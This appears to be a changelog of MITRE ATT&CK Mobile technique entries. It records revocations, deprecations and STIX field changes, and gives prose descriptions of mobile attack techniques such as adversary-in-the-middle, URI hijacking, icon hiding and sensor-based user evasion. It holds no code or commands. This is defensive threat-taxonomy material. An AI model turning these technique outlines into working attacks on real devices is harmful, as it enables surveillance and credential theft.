external_referencesV. Katalov. (2018, December 18). Six Ways to Decrypt iPhone Passwords from the Keychain. Retrieved June 24, 2020.
values_changed
STIX FieldOld valueNew Value
modified2020-06-24 19:02:46.237000+00:002022-04-01 15:02:43.470000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueApple Keychain Services
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.htmlhttps://developer.apple.com/documentation/security/keychain_services
external_references[2]['source_name']Apple Keychain ServicesElcomsoft Decrypt Keychain
external_references[2]['description']Apple, Inc.. (n.d.). Keychain Services. Retrieved June 24, 2020.V. Katalov. (2018, December 18). Six Ways to Decrypt iPhone Passwords from the Keychain. Retrieved June 24, 2020.
external_references[2]['url']https://developer.apple.com/documentation/security/keychain_serviceshttps://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/
external_references[3]['source_name']Elcomsoft Decrypt KeychainNIST Mobile Threat Catalogue
external_references[3]['url']https://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html

[T1452] Manipulate App Store Rankings or Ratings

Current version: 1.0

Description: An adversary could use access to a compromised device's credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).

This object has been revoked by [T1643] Generate Traffic from Victim

Description for [T1643] Generate Traffic from Victim: Adversaries may generate outbound traffic from devices. This is typically performed to manipulate external outcomes, such as to achieve carrier billing fraud or to manipulate app store rankings or ratings. Outbound traffic is typically generated as SMS messages or general web traffic, but may take other forms as well. If done via SMS messages, Android apps must hold the `SEND_SMS` permission. Additionally, sending an SMS message requires user consent if the recipient is a premium number. Applications cannot send SMS messages on iOS

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1055
values_changed
STIX FieldOld valueNew Value
modified2019-07-03 20:25:59.845000+00:002022-04-06 13:57:24.726000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1463] Manipulate Device Communication

Current version: 1.1

Description: If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected. For example, FireEye researchers found in 2014 that 68% of the top 1,000 free applications in the Google Play Store had at least one Transport Layer Security (TLS) implementation vulnerability potentially opening the applications' network traffic to adversary-in-the-middle attacks (Citation: FireEye-SSL).

This object has been revoked by [T1638] Adversary-in-the-Middle

Description for [T1638] Adversary-in-the-Middle: Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. If applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAdrian Mettler, Yulong Zhang, Vishwanath Raman. (2014, August 20). SSL VULNERABILITIES: WHO LISTENS WHEN ANDROID APPLICATIONS TALK?. Retrieved December 24, 2016.
external_referencesAPP-1
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1066
external_referencesAPP-1
external_referencesAdrian Mettler, Yulong Zhang, Vishwanath Raman. (2014, August 20). SSL VULNERABILITIES: WHO LISTENS WHEN ANDROID APPLICATIONS TALK?. Retrieved December 24, 2016.
values_changed
STIX FieldOld valueNew Value
modified2021-07-28 18:45:08.382000+00:002022-04-06 15:44:48.421000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueFireEye-SSL
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.htmlhttps://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
external_references[2]['source_name']FireEye-SSLNIST Mobile Threat Catalogue
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.htmlhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html

[T1400] Modify System Partition

Current version: 1.2

Description: If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device system partition, where it may persist after device resets and may not be easily removed by the device user. Many Android devices provide the ability to unlock the bootloader for development purposes. An unlocked bootloader may provide the ability for an adversary to modify the system partition. Even if the bootloader is locked, it may be possible for an adversary to escalate privileges and then modify the system partition.

This object has been revoked by [T1625.001] System Runtime API Hijacking

Description for [T1625.001] System Runtime API Hijacking: Adversaries may execute their own malicious payloads by hijacking the way an operating system run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur at later points in time. On Android, adversaries may overwrite the standard OS API library with a malicious alternative to hook into core functions to achieve persistence. By doing this, the adversary’s code will be executed every time the overwritten API function is called by an app on the infected device.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAndroid. (n.d.). Verified Boot. Retrieved December 21, 2016.
external_referencesAPP-27
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1003
external_referencesAPP-27
external_referencesApple. (2016, May). iOS Security. Retrieved December 21, 2016.
values_changed
STIX FieldOld valueNew Value
modified2019-09-04 13:35:57.549000+00:002022-03-30 15:18:21.242000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueAndroid-VerifiedBoot
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.htmlhttps://source.android.com/security/verifiedboot/
external_references[2]['source_name']Android-VerifiedBootApple-iOSSecurityGuide
external_references[2]['description']Android. (n.d.). Verified Boot. Retrieved December 21, 2016.Apple. (2016, May). iOS Security. Retrieved December 21, 2016.
external_references[2]['url']https://source.android.com/security/verifiedboot/https://www.apple.com/business/docs/iOS_Security_Guide.pdf
external_references[3]['source_name']Apple-iOSSecurityGuideNIST Mobile Threat Catalogue
external_references[3]['url']https://www.apple.com/business/docs/iOS_Security_Guide.pdfhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

[T1507] Network Information Discovery

Current version: 1.0

Description: Adversaries may use device sensors to collect information about nearby networks, such as Wi-Fi and Bluetooth.

This object has been revoked by [T1421] System Network Connections Discovery

Description for [T1421] System Network Connections Discovery: Adversaries may attempt to get a listing of network connections to or from the compromised device they are currently accessing or from remote systems by querying for information over the network. This is typically accomplished by utilizing device APIs to collect information about nearby networks, such as Wi-Fi, Bluetooth, and cellular tower connections. On Android, this can be done by querying the respective APIs: * `WifiInfo` for information about the current Wi-Fi connection, as well as nearby Wi-Fi networks. Querying the `WiFiInfo` API requires the application to hold the `ACCESS_FINE_LOCATION` permission. * `BluetoothAdapter` for information about Bluetooth devices, which also requires the application to hold several permissions granted by the user at runtime. * For Android versions prior to Q, applications can use the `TelephonyManager.getNeighboringCellInfo()` method. For Q and later, applications can use the `TelephonyManager.getAllCellInfo()` method. Both methods require the application hold the `ACCESS_FINE_LOCATION` permission.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-07-10 15:18:16.753000+00:002022-03-31 16:33:55.068000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1410] Network Traffic Capture or Redirection

Current version: 1.0

Description: An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same. A malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple. Alternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic. An adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device's proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile. If applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.

This object has been revoked by [T1638] Adversary-in-the-Middle

Description for [T1638] Adversary-in-the-Middle: Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. If applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1013
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-15 17:52:24.123000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1468] Remotely Track Device Without Authorization

Current version: 1.1

Description: An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.(Citation: Krebs-Location)

This object has been revoked by [T1430.001] Remote Device Management Services

Description for [T1430.001] Remote Device Management Services: An adversary may use access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM)/mobile device management (MDM) server console to track the location of mobile devices managed by the service.(Citation: Krebs-Location)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesBrian Krebs. (2018, May 17). Tracking Firm LocationSmart Leaked Location Data for Customers of All Major U.S. Mobile Carriers Without Consent in Real Time Via Its Web Site. Retrieved November 8, 2018.
external_referencesEMM-7
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1071
external_referencesECO-5
external_referencesBrian Krebs. (2018, May 17). Tracking Firm LocationSmart Leaked Location Data for Customers of All Major U.S. Mobile Carriers Without Consent in Real Time Via Its Web Site. Retrieved November 8, 2018.
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 14:16:59.424000+00:002022-04-05 19:40:25.068000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueKrebs-Location
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.htmlhttps://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/
external_references[2]['url']https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.htmlhttps://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html
external_references[2]['external_id']EMM-7ECO-5
external_references[3]['source_name']Krebs-LocationNIST Mobile Threat Catalogue
external_references[3]['url']https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html

[T1467] Rogue Cellular Base Station

Current version: 1.1

Description: An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication. A compromised cellular femtocell could be used to carry out this technique(Citation: Computerworld-Femtocell).

This object has been revoked by [T1638] Adversary-in-the-Middle

Description for [T1638] Adversary-in-the-Middle: Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. If applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesJaikumar Vijayan. (2013, August 1). Researchers exploit cellular tech flaws to intercept phone calls. Retrieved December 24, 2016.
external_referencesCEL-7
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1070
external_referencesCEL-7
external_referencesJaikumar Vijayan. (2013, August 1). Researchers exploit cellular tech flaws to intercept phone calls. Retrieved December 24, 2016.
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 15:17:11.346000+00:002022-04-06 15:52:41.578000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueComputerworld-Femtocell
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.htmlhttp://www.computerworld.com/article/2484538/cybercrime-hacking/researchers-exploit-cellular-tech-flaws-to-intercept-phone-calls.html
external_references[2]['source_name']Computerworld-FemtocellNIST Mobile Threat Catalogue
external_references[2]['url']http://www.computerworld.com/article/2484538/cybercrime-hacking/researchers-exploit-cellular-tech-flaws-to-intercept-phone-calls.htmlhttps://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html

[T1465] Rogue Wi-Fi Access Points

Current version: 1.1

Description: An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).

This object has been revoked by [T1638] Adversary-in-the-Middle

Description for [T1638] Adversary-in-the-Middle: Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. If applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAlex Drozhzhin. (2014, November 10). Darkhotel: a spy campaign in luxury Asian hotels. Retrieved December 24, 2016.
external_referencesLPN-0
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1068
external_referencesLPN-0
external_referencesAlex Drozhzhin. (2014, November 10). Darkhotel: a spy campaign in luxury Asian hotels. Retrieved December 24, 2016.
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 15:15:18.023000+00:002022-04-06 15:51:11.938000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueKaspersky-DarkHotel
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-0.htmlhttps://blog.kaspersky.com/darkhotel-apt/6613/
external_references[3]['source_name']Kaspersky-DarkHotelNIST Mobile Threat Catalogue
external_references[3]['url']https://blog.kaspersky.com/darkhotel-apt/6613/https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-0.html

[T1508] Suppress Application Icon

Current version: 1.1

Description: A malicious application could suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions. This behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker)

This object has been revoked by [T1628.001] Suppress Application Icon

Description for [T1628.001] Suppress Application Icon: A malicious application could suppress its icon from being displayed to the user in the application launcher. This hides the fact that it is installed, and can make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions. This behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker) Beginning in Android 10, changes were introduced to inhibit malicious applications’ ability to hide their icon. If an app is a system app, requests no permissions, or does not have a launcher activity, the application’s icon will be fully hidden. Further, if the device is fully managed or the application is in a work profile, the icon will be fully hidden. Otherwise, a synthesized activity is shown, which is a launcher icon that represents the app’s details page in the system settings. If the user clicks the synthesized activity in the launcher, they are taken to the application’s details page in the system settings.(Citation: Android 10 Limitations to Hiding App Icons)(Citation: LauncherApps getActivityList)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors['Emily Ratliff, IBM']
values_changed
STIX FieldOld valueNew Value
modified2019-11-14 18:03:26.460000+00:002022-03-30 20:07:33.279000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']android-trojan-steals-paypal-2fasunny-stolen-credentials
external_references[1]['description']Lukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.Lukáš Štefanko. (2017, February 22). Sunny with a chance of stolen credentials: Malicious weather app found on Google Play. Retrieved July 11, 2019.
external_references[1]['url']https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/
external_references[2]['source_name']sunny-stolen-credentialsandroid-trojan-steals-paypal-2fa
external_references[2]['description']Lukáš Štefanko. (2017, February 22). Sunny with a chance of stolen credentials: Malicious weather app found on Google Play. Retrieved July 11, 2019.Lukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.
external_references[2]['url']https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/

[T1416] URI Hijacking

Current version: 2.0

Description: Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data. Applications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If a malicious application were to register for a URI that was already in use by a genuine application, the malicious application may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the malicious application to gain access to resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE)

This object has been revoked by [T1635.001] URI Hijacking

Description for [T1635.001] URI Hijacking: Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data. Applications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If an adversary were to register for a URI that was already in use by a genuine application, the adversary may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the adversary to gain access to protected resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors['Leo Zhang, Trend Micro', 'Steven Du, Trend Micro']
x_mitre_old_attack_idMOB-T1019
values_changed
STIX FieldOld valueNew Value
modified2020-10-01 12:42:21.628000+00:002022-04-01 15:17:21.508000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1576] Uninstall Malicious Application

Current version: 1.0

Description: Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by: * Abusing device owner permissions to perform silent uninstallation using device owner API calls. * Abusing root permissions to delete files from the filesystem. * Abusing the accessibility service. This requires an intent be sent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.

This object has been revoked by [T1630.001] Uninstall Malicious Application

Description for [T1630.001] Uninstall Malicious Application: Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by: * Abusing device owner permissions to perform silent uninstallation using device owner API calls. * Abusing root permissions to delete files from the filesystem. * Abusing the accessibility service. This requires sending an intent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-05-26 18:05:37.393000+00:002022-03-30 19:34:09.371000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1618] User Evasion

Current version: 1.0

Description: Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. While there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.

This object has been revoked by [T1628.002] User Evasion

Description for [T1628.002] User Evasion: Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. While there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 18:13:25.586000+00:002022-04-11 20:06:56.032000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
Deprecations

[T1413] Access Sensitive Data in Device Logs

Current version: 1.0

Description: On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device's system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1016
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-06 15:37:34.463000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1427] Attack PC via USB Connection

Current version: 1.1

Description: With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesDan Goodin. (2016, November 16). Meet PoisonTap, the $5 tool that ransacks password-protected computers. Retrieved December 22, 2016.
external_referencesPHY-2
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1030
external_referencesPHY-2
external_referencesDan Goodin. (2016, November 16). Meet PoisonTap, the $5 tool that ransacks password-protected computers. Retrieved December 22, 2016.
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 14:51:19.932000+00:002022-04-06 15:39:14.695000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueArsTechnica-PoisonTap
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.htmlhttp://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-password-protected-computers/
external_references[3]['source_name']ArsTechnica-PoisonTapNIST Mobile Threat Catalogue
external_references[3]['url']http://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-password-protected-computers/https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html

[T1436] Commonly Used Port

Current version: 1.0

Description: Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as * TCP:80 (HTTP) * TCP:443 (HTTPS) * TCP:25 (SMTP) * TCP/UDP:53 (DNS) They may use the protocol associated with the port or a completely different protocol.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1039
values_changed
STIX FieldOld valueNew Value
modified2019-06-19 19:25:33.180000+00:002022-04-06 15:40:47.556000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1475] Deliver Malicious App via Authorized App Store

Current version: 1.1

